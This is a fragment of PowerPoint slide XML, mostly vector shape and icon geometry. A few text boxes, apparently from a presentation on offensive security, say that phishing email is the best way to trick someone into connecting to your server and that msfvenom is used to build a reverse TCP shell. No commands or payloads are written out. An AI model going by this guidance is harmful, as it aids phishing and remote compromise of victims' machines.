                <a:gd name="connsiteX3" fmla="*/ 54403 w 225309"/>
                <a:gd name="connsiteY3" fmla="*/ 455920 h 455920"/>
                <a:gd name="connsiteX4" fmla="*/ 54403 w 225309"/>
                <a:gd name="connsiteY4" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX5" fmla="*/ 54403 w 225309"/>
                <a:gd name="connsiteY5" fmla="*/ 455920 h 455920"/>
                <a:gd name="connsiteX6" fmla="*/ 193296 w 225309"/>
                <a:gd name="connsiteY6" fmla="*/ 6 h 455920"/>
                <a:gd name="connsiteX7" fmla="*/ 225309 w 225309"/>
                <a:gd name="connsiteY7" fmla="*/ 2823 h 455920"/>
                <a:gd name="connsiteX8" fmla="*/ 219909 w 225309"/>
                <a:gd name="connsiteY8" fmla="*/ 69600 h 455920"/>
                <a:gd name="connsiteX9" fmla="*/ 139383 w 225309"/>
                <a:gd name="connsiteY9" fmla="*/ 96177 h 455920"/>
                <a:gd name="connsiteX10" fmla="*/ 139383 w 225309"/>
                <a:gd name="connsiteY10" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX11" fmla="*/ 217171 w 225309"/>
                <a:gd name="connsiteY11" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX12" fmla="*/ 211626 w 225309"/>
                <a:gd name="connsiteY12" fmla="*/ 215050 h 455920"/>
                <a:gd name="connsiteX13" fmla="*/ 139383 w 225309"/>
                <a:gd name="connsiteY13" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX14" fmla="*/ 139383 w 225309"/>
                <a:gd name="connsiteY14" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX15" fmla="*/ 54403 w 225309"/>
                <a:gd name="connsiteY15" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX16" fmla="*/ 54403 w 225309"/>
                <a:gd name="connsiteY16" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX17" fmla="*/ 0 w 225309"/>
                <a:gd name="connsiteY17" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX18" fmla="*/ 0 w 225309"/>
                <a:gd name="connsiteY18" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX19" fmla="*/ 54403 w 225309"/>
                <a:gd name="connsiteY19" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX20" fmla="*/ 54403 w 225309"/>
                <a:gd name="connsiteY20" fmla="*/ 90429 h 455920"/>
                <a:gd name="connsiteX21" fmla="*/ 54263 w 225309"/>
                <a:gd name="connsiteY21" fmla="*/ 89940 h 455920"/>
                <a:gd name="connsiteX22" fmla="*/ 150786 w 225309"/>
                <a:gd name="connsiteY22" fmla="*/ 971 h 455920"/>
                <a:gd name="connsiteX23" fmla="*/ 193296 w 225309"/>
                <a:gd name="connsiteY23" fmla="*/ 6 h 45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309" h="455920">
                  <a:moveTo>
                    <a:pt x="139383" y="455355"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="139383" y="455920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139383" y="455355"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="54403" y="455920"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="54403" y="455355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54403" y="455920"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="193296" y="6"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="204595" y="73"/>
                    <a:pt x="214144" y="770"/>
                    <a:pt x="225309" y="2823"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="225271" y="27274"/>
                    <a:pt x="222913" y="50194"/>
                    <a:pt x="219909" y="69600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188141" y="67117"/>
                    <a:pt x="138250" y="66776"/>
                    <a:pt x="139383" y="96177"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="139383" y="140898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217171" y="140898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211626" y="215050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139383" y="216436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139383" y="455355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54403" y="455355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54403" y="216436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="216436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="140898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54403" y="140898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54403" y="90429"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="54356" y="90266"/>
                    <a:pt x="54310" y="90103"/>
                    <a:pt x="54263" y="89940"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54393" y="21715"/>
                    <a:pt x="104084" y="2174"/>
                    <a:pt x="150786" y="971"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168948" y="503"/>
                    <a:pt x="181997" y="-60"/>
                    <a:pt x="19329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5435E4-A5D2-465D-AC14-AC1BE0EA5AAA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8105957" y="3478924"/>
              <a:ext cx="284621" cy="282605"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 249204 w 299575"/>
                <a:gd name="connsiteY0" fmla="*/ 123541 h 297454"/>
                <a:gd name="connsiteX1" fmla="*/ 241250 w 299575"/>
                <a:gd name="connsiteY1" fmla="*/ 136266 h 297454"/>
                <a:gd name="connsiteX2" fmla="*/ 229055 w 299575"/>
                <a:gd name="connsiteY2" fmla="*/ 198302 h 297454"/>
                <a:gd name="connsiteX3" fmla="*/ 116648 w 299575"/>
                <a:gd name="connsiteY3" fmla="*/ 234888 h 297454"/>
                <a:gd name="connsiteX4" fmla="*/ 59914 w 299575"/>
                <a:gd name="connsiteY4" fmla="*/ 135736 h 297454"/>
                <a:gd name="connsiteX5" fmla="*/ 58324 w 299575"/>
                <a:gd name="connsiteY5" fmla="*/ 125662 h 297454"/>
                <a:gd name="connsiteX6" fmla="*/ 36585 w 299575"/>
                <a:gd name="connsiteY6" fmla="*/ 125131 h 297454"/>
                <a:gd name="connsiteX7" fmla="*/ 31813 w 299575"/>
                <a:gd name="connsiteY7" fmla="*/ 137857 h 297454"/>
                <a:gd name="connsiteX8" fmla="*/ 31813 w 299575"/>
                <a:gd name="connsiteY8" fmla="*/ 247082 h 297454"/>
                <a:gd name="connsiteX9" fmla="*/ 51961 w 299575"/>
                <a:gd name="connsiteY9" fmla="*/ 266701 h 297454"/>
                <a:gd name="connsiteX10" fmla="*/ 150052 w 299575"/>
                <a:gd name="connsiteY10" fmla="*/ 266701 h 297454"/>
                <a:gd name="connsiteX11" fmla="*/ 250794 w 299575"/>
                <a:gd name="connsiteY11" fmla="*/ 266701 h 297454"/>
                <a:gd name="connsiteX12" fmla="*/ 269352 w 299575"/>
                <a:gd name="connsiteY12" fmla="*/ 250264 h 297454"/>
                <a:gd name="connsiteX13" fmla="*/ 269352 w 299575"/>
                <a:gd name="connsiteY13" fmla="*/ 134675 h 297454"/>
                <a:gd name="connsiteX14" fmla="*/ 261863 w 299575"/>
                <a:gd name="connsiteY14" fmla="*/ 123541 h 297454"/>
                <a:gd name="connsiteX15" fmla="*/ 249204 w 299575"/>
                <a:gd name="connsiteY15" fmla="*/ 123541 h 297454"/>
                <a:gd name="connsiteX16" fmla="*/ 151642 w 299575"/>
                <a:gd name="connsiteY16" fmla="*/ 88016 h 297454"/>
                <a:gd name="connsiteX17" fmla="*/ 89076 w 299575"/>
                <a:gd name="connsiteY17" fmla="*/ 147931 h 297454"/>
                <a:gd name="connsiteX18" fmla="*/ 150582 w 299575"/>
                <a:gd name="connsiteY18" fmla="*/ 208377 h 297454"/>
                <a:gd name="connsiteX19" fmla="*/ 212088 w 299575"/>
                <a:gd name="connsiteY19" fmla="*/ 148461 h 297454"/>
                <a:gd name="connsiteX20" fmla="*/ 151642 w 299575"/>
                <a:gd name="connsiteY20" fmla="*/ 88016 h 297454"/>
                <a:gd name="connsiteX21" fmla="*/ 234357 w 299575"/>
                <a:gd name="connsiteY21" fmla="*/ 29162 h 297454"/>
                <a:gd name="connsiteX22" fmla="*/ 203605 w 299575"/>
                <a:gd name="connsiteY22" fmla="*/ 60444 h 297454"/>
                <a:gd name="connsiteX23" fmla="*/ 235948 w 299575"/>
                <a:gd name="connsiteY23" fmla="*/ 92258 h 297454"/>
                <a:gd name="connsiteX24" fmla="*/ 268822 w 299575"/>
                <a:gd name="connsiteY24" fmla="*/ 59914 h 297454"/>
                <a:gd name="connsiteX25" fmla="*/ 268822 w 299575"/>
                <a:gd name="connsiteY25" fmla="*/ 53552 h 297454"/>
                <a:gd name="connsiteX26" fmla="*/ 245492 w 299575"/>
                <a:gd name="connsiteY26" fmla="*/ 29162 h 297454"/>
                <a:gd name="connsiteX27" fmla="*/ 234357 w 299575"/>
                <a:gd name="connsiteY27" fmla="*/ 29162 h 297454"/>
                <a:gd name="connsiteX28" fmla="*/ 41887 w 299575"/>
                <a:gd name="connsiteY28" fmla="*/ 0 h 297454"/>
                <a:gd name="connsiteX29" fmla="*/ 258217 w 299575"/>
                <a:gd name="connsiteY29" fmla="*/ 0 h 297454"/>
                <a:gd name="connsiteX30" fmla="*/ 299575 w 299575"/>
                <a:gd name="connsiteY30" fmla="*/ 41887 h 297454"/>
                <a:gd name="connsiteX31" fmla="*/ 299575 w 299575"/>
                <a:gd name="connsiteY31" fmla="*/ 255567 h 297454"/>
                <a:gd name="connsiteX32" fmla="*/ 257687 w 299575"/>
                <a:gd name="connsiteY32" fmla="*/ 297454 h 297454"/>
                <a:gd name="connsiteX33" fmla="*/ 149522 w 299575"/>
                <a:gd name="connsiteY33" fmla="*/ 297454 h 297454"/>
                <a:gd name="connsiteX34" fmla="*/ 41357 w 299575"/>
                <a:gd name="connsiteY34" fmla="*/ 297454 h 297454"/>
                <a:gd name="connsiteX35" fmla="*/ 0 w 299575"/>
                <a:gd name="connsiteY35" fmla="*/ 256096 h 297454"/>
                <a:gd name="connsiteX36" fmla="*/ 0 w 299575"/>
                <a:gd name="connsiteY36" fmla="*/ 41357 h 297454"/>
                <a:gd name="connsiteX37" fmla="*/ 41887 w 299575"/>
                <a:gd name="connsiteY37" fmla="*/ 0 h 29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9575" h="297454">
                  <a:moveTo>
                    <a:pt x="249204" y="123541"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="240190" y="123011"/>
                    <a:pt x="239659" y="128843"/>
                    <a:pt x="241250" y="136266"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245492" y="158536"/>
                    <a:pt x="240720" y="179214"/>
                    <a:pt x="229055" y="198302"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206255" y="234888"/>
                    <a:pt x="158536" y="250264"/>
                    <a:pt x="116648" y="234888"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83774" y="222692"/>
                    <a:pt x="50901" y="185577"/>
                    <a:pt x="59914" y="135736"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60444" y="132555"/>
                    <a:pt x="62565" y="127252"/>
                    <a:pt x="58324" y="125662"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51431" y="122481"/>
                    <a:pt x="43477" y="123541"/>
                    <a:pt x="36585" y="125131"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30222" y="126722"/>
                    <a:pt x="31813" y="133085"/>
                    <a:pt x="31813" y="137857"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31813" y="174442"/>
                    <a:pt x="31813" y="210497"/>
                    <a:pt x="31813" y="247082"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31813" y="262989"/>
                    <a:pt x="35524" y="266701"/>
                    <a:pt x="51961" y="266701"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84835" y="266701"/>
                    <a:pt x="117178" y="266701"/>
                    <a:pt x="150052" y="266701"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183456" y="266701"/>
                    <a:pt x="217390" y="266701"/>
                    <a:pt x="250794" y="266701"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="262459" y="266701"/>
                    <a:pt x="269352" y="261929"/>
                    <a:pt x="269352" y="250264"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="269352" y="211558"/>
                    <a:pt x="269352" y="173382"/>
                    <a:pt x="269352" y="134675"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="268822" y="126987"/>
                    <a:pt x="265773" y="124337"/>
                    <a:pt x="261863" y="123541"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="257952" y="122746"/>
                    <a:pt x="253180" y="123806"/>
                    <a:pt x="249204" y="123541"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="151642" y="88016"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="116648" y="87486"/>
                    <a:pt x="89076" y="113997"/>
                    <a:pt x="89076" y="147931"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89076" y="180805"/>
                    <a:pt x="117178" y="208377"/>
                    <a:pt x="150582" y="208377"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183986" y="208377"/>
                    <a:pt x="212088" y="181335"/>
                    <a:pt x="212088" y="148461"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212088" y="115058"/>
                    <a:pt x="185577" y="88546"/>
                    <a:pt x="151642" y="88016"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="234357" y="29162"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="207846" y="29162"/>
                    <a:pt x="204135" y="32873"/>
                    <a:pt x="203605" y="60444"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203605" y="90137"/>
                    <a:pt x="205195" y="92258"/>
                    <a:pt x="235948" y="92258"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="267762" y="92258"/>
                    <a:pt x="268822" y="91197"/>
                    <a:pt x="268822" y="59914"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="268822" y="57794"/>
                    <a:pt x="268822" y="55673"/>
                    <a:pt x="268822" y="53552"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="268822" y="35524"/>
                    <a:pt x="263519" y="29692"/>
                    <a:pt x="245492" y="29162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="241781" y="29162"/>
                    <a:pt x="238069" y="29162"/>
                    <a:pt x="234357" y="29162"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="41887" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="113998" y="0"/>
                    <a:pt x="186108" y="0"/>
                    <a:pt x="258217" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="284728" y="0"/>
                    <a:pt x="299575" y="14846"/>
                    <a:pt x="299575" y="41887"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="299575" y="112937"/>
                    <a:pt x="299575" y="184517"/>
                    <a:pt x="299575" y="255567"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="299575" y="283138"/>
                    <a:pt x="285789" y="297454"/>
                    <a:pt x="257687" y="297454"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="221632" y="297454"/>
                    <a:pt x="185577" y="297454"/>
                    <a:pt x="149522" y="297454"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113467" y="297454"/>
                    <a:pt x="77412" y="297454"/>
                    <a:pt x="41357" y="297454"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14315" y="297454"/>
                    <a:pt x="0" y="283138"/>
                    <a:pt x="0" y="256096"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="184517"/>
                    <a:pt x="0" y="112937"/>
                    <a:pt x="0" y="41357"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="14315"/>
                    <a:pt x="14846" y="0"/>
                    <a:pt x="4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32D70F0-F5AD-417D-A95D-1EBA385A7C8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="797475" y="2077107"/>
            <a:ext cx="2393093" cy="246221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With all that in hand, phishing via email is the best way to trick someone into establishing a connection with your server.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4012807" y="2816060"/>
            <a:ext cx="2416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Here we will use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msfvenom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in order to build up a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Reverse_TCP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shell.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="69" name="Graphic 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{136A6F70-EC0E-44A0-92BC-82B2BEB44690}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9151902" y="3174330"/>
            <a:ext cx="687792" cy="883022"/>
            <a:chOff x="3425127" y="0"/>
            <a:chExt cx="5341746" cy="68580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99BCC67-341C-42B6-8A43-DD85BF186024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8AFCEAF-F4F5-4EF4-A7E9-9C9498ACDDF2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97606A-71FB-4B0F-8F14-0903161DE588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038230-1B10-40D1-88FC-2BB96F9ABBB2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FCB2FB4-751A-4CF8-AB19-A88C8FA55DA2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12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B42B-14CA-4E81-806F-6104B1EFC216}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7496004" y="1920263"/>
            <a:ext cx="3864628" cy="3896248"/>
            <a:chOff x="7496004" y="1920263"/>
            <a:chExt cx="3864628" cy="3896248"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Isosceles Triangle 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D857AEF3-2BAB-4B10-A92B-50F6B5652C4C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839502" y="4413955"/>
              <a:ext cx="427534" cy="471394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3E9BF2E0-BB0D-492B-B23D-18525C8DC865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7608221" y="2961416"/>
              <a:ext cx="392828" cy="319096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 Same Side Corner Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F874CADC-9EE2-4426-B491-ED504626F9E7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000" flipH="1">
              <a:off x="10824557" y="291708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CF6CB40C-AAE3-4BC0-BE1A-A2168066A4DC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11062223" y="3784811"/>
              <a:ext cx="285020" cy="285020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24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD6FAF72-CA89-49D3-B9C9-BC90661F2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7159" y="2346892"/>
              <a:ext cx="392828" cy="3039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Isosceles Triangle 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A45748F-6022-4AD8-BF16-FE4B5FA61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619" y="5355763"/>
              <a:ext cx="372889" cy="259826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2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4BD8663-EF58-4C8A-AD10-8B9671E1C8E3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="2498363">
              <a:off x="8831623" y="1920263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A76A8299-3263-47DF-B0DC-CFD8E87EA586}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="19470155">
              <a:off x="10110329" y="1972655"/>
              <a:ext cx="132806" cy="502999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2" name="자유형: 도형 94">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DAE9AE7-5A5C-4C0B-A820-235CA68F560D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13500000">
              <a:off x="9503918" y="5364438"/>
              <a:ext cx="71616" cy="502304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C623668A-E552-4FA0-A1ED-1AFADAD25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073" y="5282722"/>
              <a:ext cx="141778" cy="392828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33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02331B79-8E44-4749-B2E2-C6816EB456CB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="9233259" y="1922064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30243713-6F14-4FF0-949D-ABED94C7AA9C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8136976" y="5049647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5CB07C1-BE6E-406A-AB6E-734C2C1E8101}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9626515" y="1969444"/>
              <a:ext cx="330976" cy="339180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2C0B57BA-B464-44AF-84E3-35CE5FDD7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5361" y="4863776"/>
              <a:ext cx="330939" cy="234666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7D2BFFAC-4745-4323-A6BF-5D92BA1E2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475" y="4673961"/>
              <a:ext cx="330939" cy="330692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ounded Rectangle 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B52C9B96-B6E8-4A0F-B777-A4F587CA6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9746" y="4139499"/>
              <a:ext cx="330940" cy="232884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66C83CF2-9280-44CE-88E6-50B6B5A58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44" y="5398653"/>
              <a:ext cx="300703" cy="366439"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3240944" h="3949460">
                  <a:moveTo>
                    <a:pt x="2411668" y="919204"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2652037" y="921566"/>
                    <a:pt x="2997179" y="1088232"/>
                    <a:pt x="3147060" y="1333480"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2837519" y="1559133"/>
                    <a:pt x="2713715" y="1818123"/>
                    <a:pt x="2716116" y="2148550"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2724370" y="2506677"/>
                    <a:pt x="2937416" y="2788602"/>
                    <a:pt x="3240944" y="2908604"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3111039" y="3296832"/>
                    <a:pt x="2835874" y="3920800"/>
                    <a:pt x="2360688" y="3949460"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2104982" y="3948826"/>
                    <a:pt x="1887379" y="3871989"/>
                    <a:pt x="1655487" y="3790391"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1465920" y="3881513"/>
                    <a:pt x="1178719" y="3984543"/>
                    <a:pt x="936764" y="3932790"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="634032" y="3867349"/>
                    <a:pt x="33306" y="3304229"/>
                    <a:pt x="0" y="2002921"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5122" y="1625861"/>
                    <a:pt x="224231" y="988116"/>
                    <a:pt x="1004287" y="951010"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1237754" y="955627"/>
                    <a:pt x="1430737" y="1013358"/>
                    <a:pt x="1654678" y="1150601"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1907007" y="1025844"/>
                    <a:pt x="2042657" y="934423"/>
                    <a:pt x="2411668" y="919204"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2423572" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2449670" y="236641"/>
                    <a:pt x="2449574" y="370890"/>
                    <a:pt x="2275646" y="605149"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2098536" y="787863"/>
                    <a:pt x="1909519" y="903902"/>
                    <a:pt x="1627634" y="908022"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1601565" y="662380"/>
                    <a:pt x="1689794" y="371496"/>
                    <a:pt x="1823269" y="256823"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1945582" y="131527"/>
                    <a:pt x="2156003" y="39571"/>
                    <a:pt x="242357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4A3EBE81-5E07-4BBC-98BC-BA89E0429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500" y="2582839"/>
              <a:ext cx="300170" cy="347427"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3319870" h="3842533">
                  <a:moveTo>
                    <a:pt x="579936" y="1296382"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2739936" y="1296382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2739936" y="2796543"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2739936" y="2962250"/>
                    <a:pt x="2605604" y="3096582"/>
                    <a:pt x="2439897" y="3096582"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2272003" y="3096582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2272003" y="3590505"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2272003" y="3729696"/>
                    <a:pt x="2159166" y="3842533"/>
                    <a:pt x="2019975" y="3842533"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1880784" y="3842533"/>
                    <a:pt x="1767947" y="3729696"/>
                    <a:pt x="1767947" y="3590505"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1767947" y="3096582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1492066" y="3096582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1492066" y="3590505"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1492066" y="3729696"/>
                    <a:pt x="1379229" y="3842533"/>
                    <a:pt x="1240038" y="3842533"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1100847" y="3842533"/>
                    <a:pt x="988010" y="3729696"/>
                    <a:pt x="988010" y="3590505"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="988010" y="3096582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="879975" y="3096582"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="714268" y="3096582"/>
                    <a:pt x="579936" y="2962250"/>
                    <a:pt x="579936" y="2796543"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
